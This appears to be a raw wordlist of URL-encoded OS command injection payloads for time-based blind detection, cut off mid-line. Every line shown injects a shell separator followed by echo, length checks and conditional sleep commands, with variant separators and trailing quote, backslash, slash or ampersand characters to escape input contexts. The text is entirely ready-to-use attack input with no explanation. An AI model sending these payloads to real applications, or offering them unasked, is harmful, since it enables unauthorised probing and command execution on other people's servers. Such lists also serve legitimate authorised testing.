200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZEPVFU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20MKJXCW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20NMEESI%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%7C%20%5B%201%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%202%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%203%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%204%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%205%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%206%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%207%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%208%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%209%20-ne%20%24%28echo%20RZSNER%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WVUPXI%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20KQPSND%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20TSXSCX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%7C%20%5B%201%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%202%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%203%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%204%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%205%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%206%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%207%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%208%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%209%20-ne%20%24%28echo%20LQRKBX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20LVMWXB%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20BTHZML%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20YTWFPG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%7C%20%5B%201%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%202%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%203%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%204%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%205%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%206%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%207%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%208%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%7C%20%5B%209%20-ne%20%24%28echo%20TSEUFD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RORKMJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%0A%20str%3D%24%28echo%20NETEBT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%3B%20str%3D%24%28echo%20HNLFQM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20t